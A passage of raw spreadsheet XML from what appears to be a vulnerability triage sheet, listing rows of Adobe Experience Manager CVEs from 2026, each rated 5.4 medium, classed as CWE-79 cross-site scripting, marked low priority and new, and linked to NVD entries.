s="5" t="inlineStr" /><c r="K2076" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2076" s="5" t="inlineStr" /><c r="M2076" s="5" t="inlineStr" /><c r="N2076" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2076" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2076" s="5" t="inlineStr" /><c r="Q2076" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75709</t></is></c></row><row r="2077"><c r="A2077" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2077" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2077" s="5" t="inlineStr"><is><t>CVE-2026-75710</t></is></c><c r="D2077" s="5" t="n"><v>5.4</v></c><c r="E2077" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2077" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2077" s="5" t="inlineStr" /><c r="H2077" s="5" t="n"><v>0.003</v></c><c r="I2077" s="5" t="inlineStr" /><c r="J2077" s="5" t="inlineStr" /><c r="K2077" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2077" s="5" t="inlineStr" /><c r="M2077" s="5" t="inlineStr" /><c r="N2077" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2077" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2077" s="5" t="inlineStr" /><c r="Q2077" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75710</t></is></c></row><row r="2078"><c r="A2078" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2078" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2078" s="5" t="inlineStr"><is><t>CVE-2026-75711</t></is></c><c r="D2078" s="5" t="n"><v>5.4</v></c><c r="E2078" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2078" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2078" s="5" t="inlineStr" /><c r="H2078" s="5" t="n"><v>0.003</v></c><c r="I2078" s="5" t="inlineStr" /><c r="J2078" s="5" t="inlineStr" /><c r="K2078" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2078" s="5" t="inlineStr" /><c r="M2078" s="5" t="inlineStr" /><c r="N2078" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2078" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2078" s="5" t="inlineStr" /><c r="Q2078" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75711</t></is></c></row><row r="2079"><c r="A2079" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2079" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2079" s="5" t="inlineStr"><is><t>CVE-2026-75712</t></is></c><c r="D2079" s="5" t="n"><v>5.4</v></c><c r="E2079" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2079" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2079" s="5" t="inlineStr" /><c r="H2079" s="5" t="n"><v>0.003</v></c><c r="I2079" s="5" t="inlineStr" /><c r="J2079" s="5" t="inlineStr" /><c r="K2079" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2079" s="5" t="inlineStr" /><c r="M2079" s="5" t="inlineStr" /><c r="N2079" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2079" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2079" s="5" t="inlineStr" /><c r="Q2079" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R207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79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75712</t></is></c></row><row r="2080"><c r="A2080" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2080" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2080" s="5" t="inlineStr"><is><t>CVE-2026-75713</t></is></c><c r="D2080" s="5" t="n"><v>5.4</v></c><c r="E2080" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2080" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2080" s="5" t="inlineStr" /><c r="H2080" s="5" t="n"><v>0.003</v></c><c r="I2080" s="5" t="inlineStr" /><c r="J2080" s="5" t="inlineStr" /><c r="K2080" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2080" s="5" t="inlineStr" /><c r="M2080" s="5" t="inlineStr" /><c r="N2080" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2080" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2080" s="5" t="inlineStr" /><c r="Q2080" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R208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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75713</t></is></c></row><row r="2081"><c r="A2081" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2081" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2081" s="5" t="inlineStr"><is><t>CVE-2026-75714</t></is></c><c r="D2081" s="5" t="n"><v>5.4</v></c><c r="E2081" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2081" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2081" s="5" t="inlineStr" /><c r="H2081" s="5" t="n"><v>0.003</v></c><c r="I2081" s="5" t="inlineStr" /><c r="J2081" s="5" t="inlineStr" /><c r="K2081" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2081" s="5" t="inlineStr" /><c r="M2081" s="5" t="inlineStr" /><c r="N2081" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2081" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2081" s="5" t="inlineStr" /><c r="Q2081" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2081"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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75714</t></is></c></row><row r="2082"><c r="A2082" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2082" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2082" s="5" t="inlineStr"><is><t>CVE-2026-75715</t></is></c><c r="D2082" s="5" t="n"><v>5.4</v></c><c r="E2082" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2082" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2082" s="5" t="inlineStr" /><c r="H2082" s="5" t="n"><v>0.003</v></c><c r="I2082" s="5" t="inlineStr" /><c r="J2082" s="5" t="inlineStr" /><c r="K2082" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2082" s="5" t="inlineStr" /><c r="M2082" s="5" t="inlineStr" /><c r="N2082" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2082" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2082" s="5" t="inlineStr" /><c r="Q2082" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2082"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75715</t></is></c></row><row r="2083"><c r="A2083" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2083" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2083" s="5" t="inlineStr"><is><t>CVE-2026-75716</t></is></c><c r="D2083" s="5" t="n"><v>5.4</v></c><c r="E2083" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2083" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2083" s="5" t="inlineStr" /><c r="H2083" s="5" t="n"><v>0.003</v></c><c r="I2083" s="5" t="inlineStr" /><c r="J2083" s="5" t="inlineStr" /><c r="K2083" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2083" s="5" t="inlineStr" /><c r="M2083" s="5" t="inlineStr" /><c r="N2083" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2083" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2083" s="5" t="inlineStr" /><c r="Q2083" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2083"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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75716</t></is></c></row><row r="2084"><c r="A2084" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2084" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2084" s="5" t="inlineStr"><is><t>CVE-2026-75717</t></is></c><c r="D2084" s="5" t="n"><v>5.4</v></c><c r="E2084" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2084" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2084" s="5" t="inlineStr" /><c r="H2084" s="5" t="n"><v>0.003</v></c><c r="I2084" s="5" t="inlineStr" /><c r="J2084" s="5" t="inlineStr" /><c r="K2084" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2084" s="5" t="inlineStr" /><c r="M2084" s="5" t="inlineStr" /><c r="N2084" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2084" s="5" t="inlineStr" /><c r="Q2084" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2084"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75717</t></is></c></row><row r="2085"><c r="A2085" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2085" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2085" s="5" t="inlineStr"><is><t>CVE-2026-75718</t></is></c><c r="D2085" s="5" t="n"><v>5.4</v></c><c r="E2085" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2085" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2085" s="5" t="inlineStr" /><c r="H2085" s="5" t="n"><v>0.003</v></c><c r="I2085" s="5" t="inlineStr" /><c r="J2085" s="5" t="inlineStr" /><c r="K2085" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2085" s="5" t="inlineStr" /><c r="M2085" s="5" t="inlineStr" /><c r="N2085" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2085" s="5" t="inlineStr" /><c r="Q2085" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2085"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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75718</t></is></c></row><row r="2086"><c r="A2086" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2086" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2086" s="5" t="inlineStr"><is><t>CVE-2026-75719</t></is></c><c r="D2086" s="5" t="n"><v>5.4</v></c><c r="E2086" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2086" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2086" s="5" t="inlineStr" /><c r="H2086" s="5" t="n"><v>0.003</v></c><c r="I2086" s="5" t="inlineStr" /><c r="J2086" s="5" t="inlineStr" /><c r="K2086" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2086" s="5" t="inlineStr" /><c r="M2086" s="5" t="inlineStr" /><c r="N2086" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2086" s="5" t="inlineStr" /><c r="Q2086" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2086"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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75719</t></is></c></row><row r="2087"><c r="A2087" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2087" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2087" s="5" t="inlineStr"><is><t>CVE-2026-75720</t></is></c><c r="D2087" s="5" t="n"><v>5.4</v></c><c r="E2087" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2087" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2087" s="5" t="inlineStr" /><c r="H2087" s="5" t="n"><v>0.003</v></c><c r="I2087" s="5" t="inlineStr" /><c r="J2087" s="5" t="inlineStr" /><c r="K2087" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2087" s="5" t="inlineStr" /><c r="M2087" s="5" t="inlineStr" /><c r="N2087" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2087" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2087" s="5" t="inlineStr" /><c r="Q2087" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2087"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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75720</t></is></c></row><row r="2088"><c r="A2088" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2088" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2088" s="5" t="inlineStr"><is><t>CVE-2026-75722</t></is></c><c r="D2088" s="5" t="n"><v>5.4</v></c><c r="E2088" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2088" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2088" s="5" t="inlineStr" /><c r="H2088" s="5" t="n"><v>0.003</v></c><c r="I2088" s="5" t="inlineStr" /><c r="J2088" s="5" t="inlineStr" /><c r="K2088" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2088" s="5" t="inlineStr" /><c r="M2088" s="5" t="inlineStr" /><c r="N2088" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2088" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2088" s="5" t="inlineStr" /><c r="Q2088" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2088"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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75722</t></is></c></row><row r="2089"><c r="A2089" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2089" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2089" s="5" t="inlineStr"><is><t>CVE-2026-75724</t></is></c><c r="D2089" s="5" t="n"><v>5.4</v></c><c r="E2089" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2089" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2089" s="5" t="inlineStr" /><c r="H2089" s="5" t="n"><v>0.003</v></c><c r="I2089" s="5" t="inlineStr" /><c r="J2089" s="5" t="inlineStr" /><c r="K2089" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2089" s="5" t="inlineStr" /><c r="M2089" s="5" t="inlineStr" /><c r="N2089" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2089" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2089" s="5" t="inlineStr" /><c r="Q2089" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2089"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89" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75724</t></is></c></row><row r="2090"><c r="A2090" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2090" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2090" s="5" t="inlineStr"><is><t>CVE-2026-75725</t></is></c><c r="D2090" s="5" t="n"><v>5.4</v></c><c r="E2090" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2090" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2090" s="5" t="inlineStr" /><c r="H2090" s="5" t="n"><v>0.003</v></c><c r="I2090" s="5" t="inlineStr" /><c r="J2090" s="5" t="inlineStr" /><c r="K2090" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2090" s="5" t="inlineStr" /><c r="M2090" s="5" t="inlineStr" /><c r="N2090" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2090" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2090" s="5" t="inlineStr" /><c r="Q2090" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2090" s="5" t="inlineStr"><is><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is></c><c r="S2090" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75725</t></is></c></row><row r="2091"><c r="A2091" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2091" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2091" s="5" t="inlineStr"><is><t>CVE-2026-75727</t></is></c><c r="D2091" s="5" t="n"><v>5.4</v></c><c r="E2091" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2091" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2091" s="5" t="inlineStr" /><c r="H2091" s="5" t="n"><v>0.003</v></c><c r="I2091" s="5" t="inlineStr" /><c r="J2091" s="5" t="inlineStr" /><c r="K2091" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2091" s="5" t="inlineStr" /><c r="M2091" s="5" t="inlineStr" /><c r="N2091" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2091" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2091" s="5" t="inlineStr" /><c r="Q2091" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R209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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75727</t></is></c></row><row r="2092"><c r="A2092" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2092" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2092" s="5" t="inlineStr"><is><t>CVE-2026-75729</t></is></c><c r="D2092" s="5" t="n"><v>5.4</v></c><c r="E2092" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2092" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2092" s="5" t="inlineStr" /><c r="H2092" s="5" t="n"><v>0.003</v></c><c r="I2092" s="5" t="inlineStr" /><c r="J2092" s="5" t="inlineStr" /><c r="K2092" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2092" s="5" t="inlineStr" /><c r="M2092" s="5" t="inlineStr" /><c r="N2092" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2092" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2092" s="5" t="inlineStr" /><c r="Q2092" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R209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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75729</t></is></c></row><row r="2093"><c r="A2093" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2093" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2093" s="5" t="inlineStr"><is><t>CVE-2026-75730</t></is></c><c r="D2093" s="5" t="n"><v>5.4</v></c><c r="E2093" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2093" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2093" s="5" t="inlineStr" /><c r="H2093" s="5" t="n"><v>0.003</v></c><c r="I2093" s="5" t="inlineStr" /><c r="J2093" s="5" t="inlineStr" /><c r="K2093" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2093" s="5" t="inlineStr" /><c r="M2093" s="5" t="inlineStr" /><c r="N2093" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2093" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2093" s="5" t="inlineStr" /><c r="Q2093" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R209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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75730</t></is></c></row><row r="2094"><c r="A2094" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2094" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2094" s="5" t="inlineStr"><is><t>CVE-2026-75731</t></is></c><c r="D2094" s="5" t="n"><v>5.4</v></c><c r="E2094" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2094" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2094" s="5" t="inlineStr" /><c r="H2094" s="5" t="n"><v>0.003</v></c><c r="I2094" s="5" t="inlineStr" /><c r="J2094" s="5" t="inlineStr" /><c r="K2094" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2094" s="5" t="inlineStr" /><c r="M2094" s="5" t="inlineStr" /><c r="N2094" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2094" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2094" s="5" t="inlineStr" /><c r="Q2094" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R209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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75731</t></is></c></row><row r="2095"><c r="A2095" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2095" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2095" s="5" t="inlineStr"><is><t>CVE-2026-75733</t></is></c><c r="D2095" s="5" t="n"><v>5.4</v></c><c r="E2095" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2095" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2095" s="5" t="inlineStr" /><c r="H2095" s="5" t="n"><v>0.003</v></c><c r="I2095" s="5" t="inlineStr" /><c r="J2095" s="5" t="inlineStr" /><c r="K2095" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2095" s="5" t="inlineStr" /><c r="M2095" s="5" t="inlineStr" /><c r="N2095" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2095" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2095" s="5" t="inlineStr" /><c r="Q2095" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R209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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75733</t></is></c></row><row r="2096"><c r="A2096" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2096" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2096" s="5" t="inlineStr"><is><t>CVE-2026-75734</t></is></c><c r="D2096" s="5" t="n"><v>5.4</v></c><c r="E2096" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2096" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2096" s="5" t="inlineStr" /><c r="H2096" s="5" t="n"><v>0.003</v></c><c r="I2096" s="5" t="inlineStr" /><c r="J2096" s="5" t="inlineStr" /><c r="K2096" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2096" s="5" t="inlineStr" /><c r="M2096" s="5" t="inlineStr" /><c r="N2096" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2096" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2096" s="5" t="inlineStr" /><c r="Q2096" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2096"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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75734</t></is></c></row><row r="2097"><c r="A2097" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2097" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2097" s="5" t="inlineStr"><is><t>CVE-2026-75735</t></is></c><c r="D2097" s="5" t="n"><v>5.4</v></c><c r="E2097" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2097" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2097" s="5" t="inlineStr" /><c r="H2097" s="5" t="n"><v>0.003</v></c><c r="I2097" s="5" t="inlineStr" /><c r="J2097" s="5" t="inlineStr" /><c r="K2097" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2097" s="5" t="inlineStr" /><c r="M2097" s="5" t="inlineStr" /><c r="N2097" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2097" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2097" s="5" t="inlineStr" /><c r="Q2097" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2097"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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75735</t></is></c></row><row r="2098"><c r="A2098" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2098" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2098" s="5" t="inlineStr"><is><t>CVE-2026-75736</t></is></c><c r="D2098" s="5" t="n"><v>5.4</v></c><c r="E2098" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2098" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2098" s="5" t="inlineStr" /><c r="H2098" s="5" t="n"><v>0.003</v></c><c r="I2098" s="5" t="inlineStr" /><c r="J2098" s="5" t="inlineStr" /><c r="K2098" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2098" s="5" t="inlineStr" /><c r="M2098" s="5" t="inlineStr" /><c r="N2098" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2098" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2098" s="5" t="inlineStr" /><c r="Q2098" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2098"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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75736</t></is></c></row><row r="2099"><c r="A2099" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2099" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2099" s="5" t="inlineStr"><is><t>CVE-2026-75737</t></is></c><c r="D2099" s="5" t="n"><v>5.4</v></c><c r="E2099" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2099" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2099" s="5" t="inlineStr" /><c r="H2099" s="5" t="n"><v>0.003</v></c><c r="I2099" s="5" t="inlineStr" /><c r="J2099" s="5" t="inlineStr" /><c r="K2099" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2099" s="5" t="inlineStr" /><c r="M2099" s="5" t="inlineStr" /><c r="N2099" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2099" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2099" s="5" t="inlineStr" /><c r="Q2099" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2099"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099" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75737</t></is></c></row><row r="2100"><c r="A2100" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2100" s="5" t="inlineStr"><is><t>CVE-2026-75738</t></is></c><c r="D2100" s="5" t="n"><v>5.4</v></c><c r="E2100" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2100" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2100" s="5" t="inlineStr" /><c r="H2100" s="5" t="n"><v>0.003</v></c><c r="I2100" s="5" t="inlineStr" /><c r="J2100" s="5" t="inlineStr" /><c r="K2100" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2100" s="5" t="inlineStr" /><c r="M2100" s="5" t="inlineStr" /><c r="N2100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2100" s="5" t="inlineStr" /><c r="Q2100" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2100"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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75738</t></is></c></row><row r="2101"><c r="A2101" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2101" s="5" t="inlineStr"><is><t>CVE-2026-75739</t></is></c><c r="D2101" s="5" t="n"><v>5.4</v></c><c r="E2101" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2101" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2101" s="5" t="inlineStr" /><c r="H2101" s="5" t="n"><v>0.003</v></c><c r="I2101" s="5" t="inlineStr" /><c r="J2101" s="5" t="inlineStr" /><c r="K2101" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2101" s="5" t="inlineStr" /><c r="M2101" s="5" t="inlineStr" /><c r="N2101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2101" s="5" t="inlineStr" /><c r="Q2101" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2101"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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75739</t></is></c></row><row 